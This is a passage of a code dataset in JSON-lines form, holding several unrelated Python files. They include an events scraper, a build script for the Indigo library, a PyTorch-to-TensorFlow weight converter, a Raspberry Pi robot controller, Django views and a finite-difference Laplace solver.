str(i.tag)\n value = str(i.text)\n info[key] = value\n \n fesInfo.append(info)\n \n reducedInfos = []\n \n for event in fesInfo:\n r = getRelevantInfo(event)\n reducedInfos.append(r)\n\n\n#scrape data parsing and creating table elements\n dname=r['start']\n dname=dname.split(\"T\")\n date=dname[0].split(\"-\")\n s=date[0]+'/'+date[1]+'/'+date[2]\n sec=time.mktime(datetime.datetime.strptime(s,'%Y/%m/%d').timetuple())\n\n stime=r['start']\n etime=r['end']\n stime=stime.split(\"T\")\n stime=stime[1].split(\"-\")\n stime=stime[0].split(\":\")\n\n etime=etime.split(\"T\")\n etime=etime[1].split(\"-\")\n etime=etime[0].split(\":\")\n start=int(stime[0])\n end=int(etime[0])\n \n if start > 11:\n if start !=12:start=start-12\n setime=str(start)+\":\"+stime[1]+'pm-'\n else:\n setime=str(start)+\":\"+stime[1]+'am-'\n if end > 11:\n if end !=12:end=end-12\n setime=setime+str(end)+\":\"+etime[1]+'pm'\n else:\n setime=setime+str(end)+\":\"+etime[1]+'am' \n \n \n s1=int(stime[0])\n if s1 < 10.5:\n meal1='Breakfast'\n elif (s1 > 10.5) and (s1 < 16):\n meal1='Lunch'\n# print 'meal1',stime[0]\n else:\n meal1='Dinner'\n\n\n e1=int(etime[0])\n if e1 < 10.5:\n meal2='Breakfast'\n elif (e1 > 10.5) and (e1 < 16):\n meal2='Lunch'\n# print 'meal2',stime[0]\n else:\n meal2='Dinner'\n \n\n# print'mealq',meal1,meal2\n if meal1==meal2:\n eventscornell(r['location'],r['room_number'],sec,setime,meal1,r['title'],r['free'],r['description'])\n else:\n eventscornell(r['location'],r['room_number'],sec,setime,meal1,r['title'],r['free'],r['description'])\n eventscornell(r['location'],r['room_number'],sec,setime,meal2,r['title'],r['free'],r['description'])\n \n\n return reducedInfos\n\n# <codecell>\n\n#RAMIN THIS IS THE IMPORTANT DATA\n#\n#'infos', here below, is a list of python dictionaries that contains relevant event information.\n#\n# use the function call : >>> getFoodInfoForDB(getWeekOfFoodEvents()) \n# this call will get the information you require.\n# MAKE SURE YOU HAVE ALL THE FUNCTIONS FROM THE TOP OF THIS SCRIPT!! (AND THE IMPORT STATEMENTS)\n#\ninfos = getFoodInfoForDB(getWeekOfFoodEvents())\n#print infos\n# <codecell>\n\n\n# <codecell>\n\n\n","repo_name":"zporges/cornellfood","sub_path":"pythonscripts/cornellevents.py","file_name":"cornellevents.py","file_ext":"py","file_size_in_byte":7637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"32527736877","text":"import os\r\nimport shutil\r\nimport subprocess\r\nimport sys\r\nfrom optparse import OptionParser\r\n\r\n\r\ndef make_zips(api_dir, dist_dir):\r\n parser = OptionParser(description='Indigo Python libraries build script')\r\n parser.add_option('--suffix', '-s', help='archive suffix', default=\"\")\r\n\r\n (args, left_args) = parser.parse_args()\r\n\r\n # Find indigo version\r\n from get_indigo_version import getIndigoVersion\r\n version = getIndigoVersion()\r\n\r\n if not os.path.exists(dist_dir):\r\n os.mkdir(dist_dir)\r\n\r\n archive_name = \"./indigo-python-%s-%s\" % (version, args.suffix)\r\n\r\n dest = os.path.join(dist_dir, archive_name)\r\n if os.path.exists(dest):\r\n shutil.rmtree(dest)\r\n os.mkdir(dest)\r\n os.mkdir(os.path.join(dest, 'indigo'))\r\n shutil.copy(os.path.join(api_dir, \"python\", 'indigo.py'), os.path.join(dest, 'indigo', '__init__.py'))\r\n shutil.copy(os.path.join(api_dir, \"plugins\", \"renderer\", \"python\", \"indigo_renderer.py\"), dest)\r\n shutil.copy(os.path.join(api_dir, \"plugins\", \"renderer\", \"python\", \"indigo_renderer.py\"), os.path.join(dest, 'indigo', 'renderer.py'))\r\n shutil.copy(os.path.join(api_dir, \"plugins\", \"inchi\", \"python\", \"indigo_inchi.py\"), dest)\r\n shutil.copy(os.path.join(api_dir, \"plugins\", \"inchi\", \"python\", \"indigo_inchi.py\"), os.path.join(dest, 'indigo', 'inchi.py'))\r\n shutil.copy(os.path.join(api_dir, \"plugins\", \"bingo\", \"python\", \"bingo.py\"), dest)\r\n shutil.copy(os.path.join(api_dir, \"plugins\", \"bingo\", \"python\", \"bingo.py\"), os.path.join(dest, 'indigo', 'bingo.py'))\r\n shutil.copytree(os.path.join(api_dir, \"libs\", \"shared\"), os.path.join(dest, \"lib\"), ignore=shutil.ignore_patterns(\"*.lib\"))\r\n\r\n shutil.copy(os.path.join(api_dir, \"LICENSE\"), dest)\r\n os.chdir(dist_dir)\r\n if os.path.exists(archive_name + \".zip\"):\r\n os.remove(archive_name + \".zip\")\r\n shutil.make_archive(archive_name, 'zip', os.path.dirname(archive_name), archive_name)\r\n shutil.rmtree(archive_name)\r\n full_archive_name = os.path.normpath(os.path.join(dist_dir, archive_name))\r\n print('Archive {}.zip created'.format(full_archive_name))\r\n\r\n\r\ndef make_wheels(api_dir, dest):\r\n if os.path.exists(dest):\r\n shutil.rmtree(dest)\r\n os.makedirs(dest)\r\n os.makedirs(os.path.join(dest, 'indigo'))\r\n\r\n shutil.copy(os.path.join(api_dir, \"LICENSE\"), dest)\r\n shutil.copy(os.path.join(api_dir, \"python\", \"indigo.py\"), os.path.join(dest, 'indigo', '__init__.py'))\r\n shutil.copy(os.path.join(api_dir, \"plugins\", \"renderer\", \"python\", \"indigo_renderer.py\"), os.path.join(dest, 'indigo', 'renderer.py'))\r\n shutil.copy(os.path.join(api_dir, \"plugins\", \"inchi\", \"python\", \"indigo_inchi.py\"), os.path.join(dest, 'indigo', 'inchi.py'))\r\n shutil.copy(os.path.join(api_dir, \"plugins\", \"bingo\", \"python\", \"bingo.py\"), os.path.join(dest, 'indigo', 'bingo.py'))\r\n shutil.copy(os.path.join(api_dir, \"python\", \"setup.py\"), dest)\r\n shutil.copytree(os.path.join(api_dir, \"libs\", \"shared\"), os.path.join(dest, 'indigo', \"lib\"), ignore=shutil.ignore_patterns(\"*.lib\"))\r\n cur_dir = os.path.abspath(os.curdir)\r\n os.chdir(dest)\r\n subprocess.check_call([sys.executable, 'setup.py', 'bdist_wheel', '--plat-name=win32'])\r\n subprocess.check_call([sys.executable, 'setup.py', 'bdist_wheel', '--plat-name=win_amd64'])\r\n subprocess.check_call([sys.executable, 'setup.py', 'bdist_wheel', '--plat-name=manylinux1_x86_64'])\r\n subprocess.check_call([sys.executable, 'setup.py', 'bdist_wheel', '--plat-name=manylinux1_i686'])\r\n subprocess.check_call([sys.executable, 'setup.py', 'bdist_wheel', '--plat-name=macosx_10_7_intel'])\r\n os.chdir(cur_dir)\r\n\r\n\r\nif __name__ == '__main__':\r\n api_dir = os.path.abspath(os.path.dirname(__file__))\r\n root = os.path.normpath(os.path.join(api_dir, \"..\"))\r\n dist_dir = os.path.join(root, \"dist\")\r\n make_zips(api_dir, dist_dir)\r\n if sys.argv[1] == '-s' and sys.argv[2] == '-universal':\r\n make_wheels(api_dir, os.path.join(dist_dir, 'epam.indigo'))\r\n","repo_name":"AlexanderSavelyev/indigo-test","sub_path":"api/make-python-wrappers.py","file_name":"make-python-wrappers.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13216746117","text":"import logging\nfrom typing import Any, List, NamedTuple, Tuple\n\nimport numpy as np\nimport tensorflow as tf\nimport torch\n\nfrom model import base_model, dla\n\n\nclass WeightHandlerReturn(NamedTuple):\n \"\"\"\n Return data class for WeightHandler.\n processed - True if the weight pair was successfully handled\n matched_source - True if the source weight was processed\n matched_target - True if the target weight was processed\n \"\"\"\n processed: bool\n matched_source: bool\n matched_target: bool\n\n\nclass WeightHandler:\n \"\"\"\n Generic class that deals with processing of a specific pair of weights and chains the operations.\n For subclassing, _process_weights method must be implemented.\n \"\"\"\n\n def __init__(self, logger: logging.Logger = None):\n self.next_handler = None\n self.logger = logger\n\n def then(self, next_handler):\n \"\"\"next_handler: WeightHandler - the next operation to be called if the current handler can not resolve the\n matching\"\"\"\n self.next_handler = next_handler\n return next_handler\n\n def set_chain_logger(self, logger: logging.Logger):\n \"\"\"logger: logging.Logger - the logger to be set on all the chained operations\"\"\"\n self.logger = logger\n if self.next_handler is not None:\n self.next_handler.set_chain_logger(logger)\n\n def convert_weight(self, source_weight, target_weight) -> WeightHandlerReturn:\n \"\"\"\n Tries to assign the source_weight to target_weight (i.e. target_weight = source_weight).\n If the assignment is not possible, the next handler in chain is called and the result is returned.\n\n Args:\n source_weight: Any\n target_weight: Any\n Returns:\n WeightHandlerReturn\n \"\"\"\n\n result = self._process_weights(source_weight, target_weight)\n if not result.processed and self.next_handler is not None:\n return self.next_handler.convert_weight(source_weight, target_weight)\n return result\n\n def __call__(self, source_weight, target_weight):\n return self.convert_weight(source_weight, target_weight)\n\n def _process_weights(self, source_weight, target_weight) -> WeightHandlerReturn:\n \"\"\"Should provide the actual processing logic for the given weight pair\"\"\"\n raise NotImplementedError\n\n\nclass PytorchToTensorflowHandlers:\n @staticmethod\n def _preprocess_tensorflow(tensorflow_weight):\n return tensorflow_weight, tensorflow_weight.name, tuple(tensorflow_weight.shape)\n\n @staticmethod\n def _preprocess_pytorch(pytorch_weight):\n return pytorch_weight[1], pytorch_weight[0], tuple(pytorch_weight[1].shape)\n\n class SameShapeHandler(WeightHandler):\n \"\"\"Assigns source_weight to target_weight if the weights have same shape.\"\"\"\n\n def _process_weights(self, source_weight, target_weight) -> WeightHandlerReturn:\n weight_tf, name_tf, shape_tf = PytorchToTensorflowHandlers._preprocess_tensorflow(target_weight)\n weight_py, name_py, shape_py = PytorchToTensorflowHandlers._preprocess_pytorch(source_weight)\n\n if shape_tf == shape_py:\n weight_tf.assign(weight_py.numpy())\n if self.logger:\n self.logger.info(f'{name_tf} was assigned successfully from {name_py}')\n return WeightHandlerReturn(processed=True, matched_source=True, matched_target=True)\n\n return WeightHandlerReturn(processed=False, matched_source=False, matched_target=False)\n\n class ConvolutionHandler(WeightHandler):\n \"\"\"Assigns source_weight to target_weight if the weights are 2D convolution weights.\"\"\"\n\n def _process_weights(self, source_weight, target_weight) -> WeightHandlerReturn:\n weight_tf, name_tf, shape_tf = PytorchToTensorflowHandlers._preprocess_tensorflow(target_weight)\n weight_py, name_py, shape_py = PytorchToTensorflowHandlers._preprocess_pytorch(source_weight)\n\n if len(shape_tf) == len(shape_py) == 4 and shape_tf == (shape_py[2], shape_py[3], shape_py[1], shape_py[0]):\n weight_tf.assign(weight_py.numpy().transpose(2, 3, 1, 0))\n if self.logger:\n self.logger.info(f'{name_tf} was assigned successfully from {name_py}, transposed')\n return WeightHandlerReturn(processed=True, matched_source=True, matched_target=True)\n\n return WeightHandlerReturn(processed=False, matched_source=False, matched_target=False)\n\n class DepthwiseTransposedConvolutionHandler(WeightHandler):\n \"\"\"\n Assigns source_weight to target_weight if the source_weight is a depthwise transposed convolution and\n target_weight is a regular transposed convolution.\n \"\"\"\n\n def _process_weights(self, source_weight, target_weight) -> WeightHandlerReturn:\n weight_tf, name_tf, shape_tf = PytorchToTensorflowHandlers._preprocess_tensorflow(target_weight)\n weight_py, name_py, shape_py = PytorchToTensorflowHandlers._preprocess_pytorch(source_weight)\n\n if len(shape_tf) == len(shape_py) == 4:\n equal_height_width = (shape_tf[:2] == shape_py[2:])\n equal_out_channels = (shape_tf[3] == shape_py[0])\n depthwise_conv_py = (shape_py[1] == 1)\n if 'conv2d_transpose' in name_tf and equal_height_width and equal_out_channels and depthwise_conv_py:\n gen_weights = np.zeros(shape_tf, dtype=np.float32)\n py_transposed = weight_py.numpy().transpose(2, 3, 1, 0)\n for ch in range(shape_tf[2]):\n gen_weights[:, :, ch, ch] = py_transposed[:, :, 0, ch]\n weight_tf.assign(tf.convert_to_tensor(gen_weights))\n\n if self.logger:\n self.logger.info(f'{name_tf} was assigned successfully from {name_py}, depthwise convolution')\n return WeightHandlerReturn(processed=True, matched_source=True, matched_target=True)\n\n return WeightHandlerReturn(processed=False, matched_source=False, matched_target=False)\n\n class BatchNormalizationSkipExtraHandler(WeightHandler):\n \"\"\"Skips the 'num_batches_tracked' weight from pytorch BatchNorm layers.\"\"\"\n\n def _process_weights(self, source_weight, target_weight) -> WeightHandlerReturn:\n _, name_py, _ = PytorchToTensorflowHandlers._preprocess_pytorch(source_weight)\n\n if 'num_batches_tracked' in name_py:\n if self.logger:\n self.logger.info(f'skipped {name_py}')\n return WeightHandlerReturn(processed=True, matched_source=True, matched_target=False)\n\n return WeightHandlerReturn(processed=False, matched_source=False, matched_target=False)\n\n\nclass WeightsConverter:\n \"\"\"\n Deals with conversion of the source model's weights to the target model's weights.\n Args:\n source_weights: List[Any] - the weights that need to be transferred\n target_weights: List[Any] - the weights which need to receive the transfer\n weight_handler: WeighthHandler - handles a specific weight pair conversion\n silent_fail: bool - if True, when a pair of weights could not be handled, no exception is thrown.\n \"\"\"\n\n def __init__(self, source_weights: List[Any], target_weights: List[Any], weight_handler: WeightHandler,\n silent_fail: bool = False):\n self.source_weights = source_weights\n self.target_weights = target_weights\n self.weight_handler = weight_handler\n self.silent_fail = silent_fail\n\n def do_conversion(self):\n \"\"\"Iterates over the weight lists and does the conversion.\"\"\"\n source_idx = 0\n target_idx = 0\n\n while target_idx < len(self.target_weights):\n source_weight = self.source_weights[source_idx]\n target_weight = self.target_weights[target_idx]\n handle_result = self.weight_handler(source_weight, target_weight)\n if handle_result.processed:\n source_idx += handle_result.matched_source\n target_idx += handle_result.matched_target\n else:\n if not self.silent_fail:\n raise Warning(f'{target_weight} could not be matched with {source_weight}')\n\n def __call__(self):\n self.do_conversion()\n\n\nclass DLASegConverter(WeightsConverter):\n \"\"\"Class used for loading pytorch weights in tensorflow for DLASeg.\"\"\"\n\n @staticmethod\n def get_DLASeg_weights_handler() -> WeightHandler:\n \"\"\"Returns the handler used in the conversion.\"\"\"\n handler = PytorchToTensorflowHandlers.SameShapeHandler()\n handler.then(PytorchToTensorflowHandlers.ConvolutionHandler()).then(\n PytorchToTensorflowHandlers.DepthwiseTransposedConvolutionHandler()).then(\n PytorchToTensorflowHandlers.BatchNormalizationSkipExtraHandler())\n return handler\n\n @staticmethod\n def get_weights_list_pytorch(filename: str) -> List[Tuple[str, torch.Tensor]]:\n \"\"\"Loads the .pth weights from the given filename, on cpu.\"\"\"\n weights = torch.load(filename, map_location=torch.device('cpu'))\n weights = weights['state_dict']\n weights = list(weights.items())\n return weights\n\n @staticmethod\n def get_weights_list_tensorflow(model: base_model.BaseModel, batch_size: int, input_height: int,\n input_width: int) -> List[tf.Variable]:\n \"\"\"Given a base_model.BaseModel model and the input shape, it constructs and returns the list with model's\n weights.\"\"\"\n img = tf.zeros((batch_size, 3, input_height, input_width), tf.float32)\n pre_img = tf.zeros_like(img)\n pre_hm = tf.zeros((batch_size, 1, input_height, input_width), tf.float32)\n model(img, pre_img, pre_hm) # construct the weights\n return model.weights\n\n @staticmethod\n def get_logger(logging_level=logging.WARNING) -> logging.Logger:\n logger = logging.getLogger(__name__)\n logger.setLevel(logging_level)\n logger.addHandler(logging.StreamHandler())\n return logger\n\n def __init__(self, pytorch_pth_path: str, model: dla.DLASeg, batch_size: int, input_height: int, input_width: int):\n \"\"\"\n Args:\n pytorch_pth_path: str - path to .pth file holding pytorch weights (result of a .state_dict() call)\n model: dla.DLASeg - tensorflow model instance\n batch_size, input_height, input_width: int - input characteristics for the tensorflow model\n \"\"\"\n pytorch_weights = self.get_weights_list_pytorch(pytorch_pth_path)\n tensorflow_weights = self.get_weights_list_tensorflow(model, batch_size, input_height, input_width)\n handler = self.get_DLASeg_weights_handler()\n handler.set_chain_logger(self.get_logger(logging.INFO))\n super().__init__(source_weights=pytorch_weights, target_weights=tensorflow_weights, weight_handler=handler,\n silent_fail=False)\n","repo_name":"googleinterns/keypoint-mot","sub_path":"src/model/weights_converter.py","file_name":"weights_converter.py","file_ext":"py","file_size_in_byte":11113,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"25699083242","text":"import time\nimport cv2\nimport RPi.GPIO as GPIO\n\n\ndef forward(speed = 50):\n # Right motor control\n pr.start(speed)\n GPIO.output(pinr1,GPIO.LOW)\n GPIO.output(pinr2,GPIO.HIGH)\n # Left motor control\n pl.start(speed)\n GPIO.output(pinl1,GPIO.LOW)\n GPIO.output(pinl2,GPIO.HIGH)\n\ndef backward(speed = 50):\n # Right motor control\n pr.start(speed)\n GPIO.output(pinr1,GPIO.HIGH)\n GPIO.output(pinr2,GPIO.LOW)\n # Left motor control\n pl.start(speed)\n GPIO.output(pinl1,GPIO.HIGH)\n GPIO.output(pinl2,GPIO.LOW)\n\ndef rotRight():\n # Right motor control\n pr.start(30)\n GPIO.output(pinr1,GPIO.HIGH)\n GPIO.output(pinr2,GPIO.LOW)\n # Left motor control\n pl.start(30)\n GPIO.output(pinl1,GPIO.LOW)\n GPIO.output(pinl2,GPIO.HIGH)\n\ndef rotLeft():\n # Right motor control\n pr.start(30)\n GPIO.output(pinr1,GPIO.LOW)\n GPIO.output(pinr2,GPIO.HIGH)\n # Left motor control\n pl.start(30)\n GPIO.output(pinl1,GPIO.HIGH)\n GPIO.output(pinl2,GPIO.LOW)\n\ndef sstop():\n # Right motor control\n pr.start(0)\n GPIO.output(pinr1,GPIO.LOW)\n GPIO.output(pinr2,GPIO.LOW)\n # Left motor control\n pl.start(0)\n GPIO.output(pinl1,GPIO.LOW)\n GPIO.output(pinl2,GPIO.LOW)\n\ndef main():\n vid_cap = cv2.VideoCapture(0)\n try:\n while(vid_cap.isOpened()):\n # Capture frame-by-frame\n ret, frame = vid_cap.read()\n if ret:\n cv2.imshow(\"frame\",frame)\n key = cv2.waitKey(1)\n # Close window when you press q\n print('key: ',key)\n \n if key & 0xFF == ord('q'):\n break\n elif key & 0xFF == 82: #ord('z')\n print(\"forward\")\n forward()\n elif key & 0xFF == 84: #ord('s')\n print(\"backward\")\n backward()\n elif key & 0xFF == 81: #ord('a')\n print(\"rot left\")\n rotLeft()\n elif key & 0xFF == 83: #ord('e')\n print(\"rot right\")\n rotRight()\n else:\n print(\"stop\")\n sstop()\n else:\n break\n\n finally:\n cv2.destroyAllWindows()\n GPIO.cleanup()\n\n\nif __name__ == \"__main__\":\n # Setting pins board mode \n GPIO.setmode(GPIO.BOARD) # or GPIO.setmode(GPIO.BCM)\n\n # Disable warnings\n GPIO.setwarnings(False)\n\n # Setup channels\n pwmL = 15\n pinl1 = 13\n pinl2 = 11\n\n pwmR = 22\n pinr1 = 16\n pinr2 = 18\n\n GPIO.setup(pwmL, GPIO.OUT, initial=GPIO.LOW)\n GPIO.setup(pinl1, GPIO.OUT, initial=GPIO.LOW)\n GPIO.setup(pinl2, GPIO.OUT, initial=GPIO.LOW)\n\n GPIO.setup(pwmR, GPIO.OUT, initial=GPIO.LOW)\n GPIO.setup(pinr1, GPIO.OUT, initial=GPIO.LOW)\n GPIO.setup(pinr2, GPIO.OUT, initial=GPIO.LOW)\n\n pr = GPIO.PWM(pwmR, 50) # frequency=50Hz\n pl = GPIO.PWM(pwmL, 50) # frequency=50Hz\n main()","repo_name":"MedChebbi/Educational_Rpi_Robot","sub_path":"robot/teleop_cam.py","file_name":"teleop_cam.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16616887225","text":"from django.shortcuts import render, redirect\nfrom .forms import DweetForm, CustomUserCreationForm\nfrom .models import Profile\nfrom django.urls import reverse\nfrom django.contrib.auth import login\n\n\ndef dashboard(request):\n form = DweetForm(request.POST or None)\n if request.method == \"POST\":\n if form.is_valid():\n dweet = form.save(commit=False)\n dweet.user = request.user\n dweet.save()\n return redirect(\"dwitter:dashboard\")\n return render(request, \"dwitter/dashboard.html\", {\"form\": form})\n\ndef redirect_view(request):\n response = redirect('/redirect-success/')\n return response\n\ndef profile_list(request):\n profiles = Profile.objects.exclude(user=request.user)\n return render(request, \"dwitter/profile_list.html\", {\"profiles\": profiles})\n\ndef profile(request, pk):\n if not hasattr(request.user, 'profile'):\n missing_profile = Profile(user=request.user)\n missing_profile.save()\n\n profile = Profile.objects.get(pk=pk)\n if request.method == \"POST\":\n current_user_profile = request.user.profile\n data = request.POST\n action = data.get(\"follow\")\n if action == \"follow\":\n current_user_profile.follows.add(profile)\n elif action == \"unfollow\":\n current_user_profile.follows.remove(profile)\n current_user_profile.save()\n return render(request, \"dwitter/profile.html\", {\"profile\": profile})\n\ndef register(request):\n if request.method == \"GET\":\n return render(\n request, \"dwitter/register.html\",\n {\"form\": CustomUserCreationForm}\n )\n elif request.method == \"POST\":\n form = CustomUserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n return render(request, \"dwitter/dashboard.html\")\n","repo_name":"khalid-basha/project4-GSG-Social","sub_path":"social/dwitter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26034539556","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Feb 2 10:24:15 2019\r\n\r\n@author: Jorge Antonio Matias López\r\n\"\"\"\r\n#Programa que soluciona la ecuación de laplace mediante diferencias finitas, ejemplo del libro Numerical Analysis\r\n#capitulo 12.1 generalizado para n dimensiones\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nfrom time import time\r\n\r\n####################################################################\r\n\r\ndef sumalista(listaNumeros):#suma los elementos de una lista\r\n Suma = 0\r\n for i in listaNumeros:\r\n Suma = Suma + i\r\n return Suma\r\n####################################################################\r\ndef posicion(n,i,j):#posicion en la matriz\r\n pos=(n-1)*(i-1)+j-1\r\n return pos\r\n#####################################################################\r\ndef gauss(matriz,vect,tol):#Método de Gauss-Seidel\r\n print('Gauss-Seidel')\r\n dim=matriz.shape\r\n comp=np.zeros(dim[0])\r\n itera=1000\r\n res=np.zeros(dim[0])\r\n error=[]\r\n k=0\r\n t_ini=time()\r\n while k<itera:\r\n suma=0\r\n k=k+1\r\n for ren in range(0,dim[0]):\r\n suma=0\r\n for col in range(0,dim[1]):\r\n if (col != ren):\r\n suma=suma+matriz[ren,col]*res[col] \r\n res[ren]=(vect[ren]-suma)/matriz[ren,ren]\r\n del error[:]\r\n #Comprobación\r\n for ren in range(0,dim[0]):\r\n suma=0\r\n for col in range(0,dim[1]):\r\n suma=suma+matriz[ren,col]*res[col] \r\n comp[ren]=suma\r\n dif=abs(comp[ren]-vect[ren])\r\n \r\n error.append(dif)\r\n\r\n #print('Iteracion',k)\r\n if all( i<=tol for i in error) == True:\r\n break\r\n t_fin=time()\r\n t_ejecucion=round(t_fin-t_ini,10)\r\n print(res)\r\n print('El tiempo de ejecución Gauss-Seidel es '+str(t_ejecucion)+' segundos')\r\n return(res)\r\n############################################################################### \r\ndef gauss_crs(matriz,vector,tol):#Gauss-seidel con CRS\r\n print('CRS Gauss-Seidel')\r\n x,y=matriz.shape\r\n val=[]\r\n col_ind=[]\r\n ren_elem=[]\r\n di=[]\r\n cont=0\r\n for i in range(x):\r\n ren_elem.append(cont)\r\n for j in range(y):\r\n if i!=j:\r\n if matriz[i,j]!=0:\r\n val.append(matriz[i,j])\r\n col_ind.append(j)\r\n cont=cont+1\r\n else:\r\n di.append(matriz[i,j])\r\n \r\n valor=np.array(val)\r\n col=np.array(col_ind)\r\n ren=np.array(ren_elem)\r\n diag=np.array(di)\r\n #return(valor,col,ren,diag) \r\n ##GaussSeidel \r\n maxitera=1000\r\n res=np.zeros(x)\r\n exa=np.linalg.solve(matriz,vector)\r\n error=[]\r\n k=0\r\n t_ini=time()\r\n while k<maxitera:\r\n suma=0\r\n k=k+1\r\n for i in range(0,ren.size):\r\n suma=0\r\n if i != ren.size-1:\r\n for j in range(ren[i],ren[i+1]):\r\n suma=suma+valor[j]*res[col[j]] \r\n \r\n res[i]=(vector[i]-suma)/diag[i]\r\n else:\r\n for j in range(ren[i],valor.size):\r\n suma=suma+valor[j]*res[col[j]] \r\n res[i]=(vector[i]-suma)/diag[i]\r\n \r\n del error[:]\r\n \r\n \r\n #Comprobación\r\n for i in range(0,res.size):\r\n dif=abs(exa[i]-res[i])\r\n error.append(dif)\r\n if all( i<=tol for i in error) == True:\r\n break\r\n t_fin=time()\r\n t_ejecucion=round(t_fin-t_ini,10)\r\n #print(res)\r\n print('El tiempo de ejecución CRS_gauss es '+str(t_ejecucion)+' segundos')\r\n return res\r\n################################################################################\r\ndef matbld():#construccion de la matriz cuadrada de tamaño n y el vector de constantes\r\n const=[]#vector de constantes\r\n mat=[]#renglón de la matriz(se anexa un renglón en cada ciclo)\r\n for k in range(0,(n-1)**2):#llena el renglón auxiliar con ceros\r\n mat.append(0)\r\n pos=posicion(n,i,j)\r\n mat[pos]=4\r\n #condiciones de frontera\r\n if j-1>0:\r\n mat[posicion(n,i,j-1)]=-1\r\n else:\r\n const.append(0)\r\n if j+1<n:\r\n mat[posicion(n,i,j+1)]=-1\r\n else:\r\n const.append((n-i)*grad)\r\n if i-1>0:\r\n mat[posicion(n,i-1,j)]=-1\r\n else:\r\n const.append(j*grad)\r\n if i+1<n:\r\n mat[posicion(n,i+1,j)]=-1\r\n else:\r\n const.append(0)\r\n \r\n matriz.append(mat)#agregla el renglón creado a la matriz principal\r\n #agrega la suma de los coeficientes en las fronteras al vector de coeficientes\r\n vector.append(sumalista(const))\r\n return()\r\n##########################################################################################################\r\ndef solexa(n,i,j):#solucion exacta\r\n x=(j+1)*dx\r\n y=(n-i-1)*dy\r\n exa=abs(400*x*y)\r\n '''print('x','y','Solución exacta')\r\n print(x,y,exa)'''\r\n return(exa)\r\n##########################################################################################################\r\ndef error(exa,cal,n):\r\n err=np.zeros([(n-1),(n-1)])\r\n for i in range(n-1):\r\n for j in range(n-1):\r\n err[i,j]=abs(exa[i,j]-cal[i,j])#error\r\n err[i,j]=err[i,j]**2\r\n error=math.sqrt(np.sum(err))\r\n \r\n return(error)\r\n###########################################################################################################\r\n###########################################################################################################\r\n#### Inicio ###\r\ne=[]\r\ntam=[]\r\nfor k in range(4,17,2):\r\n matriz=[]\r\n vector=[]\r\n mx=100#condición de frontera (valor máximo) \r\n n=k\r\n print('n='+str(n))\r\n tol=0.00000001\r\n grad=mx/n\r\n #Tamaño del dominio\r\n lx=0.5\r\n ly=0.5\r\n\r\n dx=lx/n\r\n dy=ly/n\r\n for i in range(1,n):\r\n for j in range(1,n):\r\n matbld()\r\n \r\n mat=np.array(matriz)\r\n vec=np.array(vector)\r\n #soluciones por diferentes metodos\r\n solucion=np.linalg.solve(mat,vec)#solución del sistema de ecuaciones linalg python\r\n #sol_gauss=gauss(mat,vec,tol)#solucion Gauss-Seidel\r\n# solucion=gauss_crs(mat,vec,tol)#solucion Gauss-Seidel matriz CRS\r\n\r\n solcal=np.zeros([(n-1),(n-1)])\r\n sol=np.zeros([(n-1),(n-1)])\r\n\r\n solex=np.zeros([(n-1),(n-1)])\r\n\r\n\r\n \r\n for i in range(n-1):\r\n for j in range(n-1):\r\n \r\n solex[i,j]=solexa(n,i,j)#matriz solución exacta\r\n solcal[i,j]=solucion[(i*(n-1))+j]#matriz solucion calculada\r\n sol[i,j]=round(solucion[(i*(n-1))+j],2)#matriz solución calculada\r\n \r\n\r\n \r\n errorN2=error(solex,solcal,n)\r\n\r\n# e.append(errorN2)\r\n# tam.append(n)\r\n \r\n e.append(math.log10(errorN2))\r\n tam.append(math.log10(n))\r\n \r\n# e.append(-math.log10(errorN2))\r\n# tam.append(math.log10(n))\r\n X=np.array(tam)\r\n Y=np.array(e)\r\n#razón de convergencia\r\nfig,ax0=plt.subplots()\r\nax0.plot(X,Y)\r\nax0.grid()\r\nax0.set(xlabel='tamaño', ylabel='Error',\r\n title='Razón de convergencia -log-log')\r\n\r\n#graficas\r\n'''fig, ax = plt.subplots()#Solo genera una grafica\r\nim = ax.imshow(sol)\r\nfor i in range(sol.shape[0]):\r\n for j in range(sol.shape[0]):\r\n text = ax.text(j, i, sol[i, j],ha=\"center\",\r\n va=\"center\", color=\"w\")\r\nax.set_title(\"Solución °C\")\r\ncbar = fig.colorbar(im)\r\nfig.tight_layout()'''\r\nplt.show","repo_name":"matdelaterra/Desarrollos","sub_path":"DifFinCalor.py","file_name":"DifFinCalor.py","file_ext":"py","file_size_in_byte":7473,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5775062804","text":"from __future__ import annotations\nfrom collections import defaultdict\nimport os\nimport re\nimport traceback\nimport copy\nimport gradio as gr\nimport modules.images as images\nimport modules.scripts as scripts\nimport torch\nimport numpy as np\nfrom ldm.modules.encoders.modules import FrozenCLIPEmbedder, FrozenOpenCLIPEmbedder\nimport open_clip.tokenizer\nfrom modules import script_callbacks\nfrom modules import script_callbacks, sd_hijack_clip, sd_hijack_open_clip\nfrom modules.processing import (Processed, StableDiffusionProcessing, fix_seed,\n process_images)\nfrom modules.shared import cmd_opts, opts, state\nimport modules.shared as shared\nfrom PIL import Image\nfrom modules.sd_samplers_kdiffusion import KDiffusionSampler\nfrom modules.sd_samplers import sample_to_image\norig_callback_state = KDiffusionSampler.callback_state\nimport modules.processing\nfrom tqdm.auto import trange, tqdm\nimport k_diffusion.sampling\nfrom k_diffusion.sampling import to_d\nfrom modules import devices\nfrom modules import prompt_parser\nimport json\nfrom modules.ui_components import FormRow\nimport pandas as pd\nimport random\nglobal mask\nglobal start_noise\nbefore_image_saved_handler = None\nimages_to_show = []\ndef slerp_with_mask(val, noise, subnoise):\n global mask\n global start_noise\n mask = mask.bool()\n mask[3,:,:] = mask[0,:,:]\n mask_float = 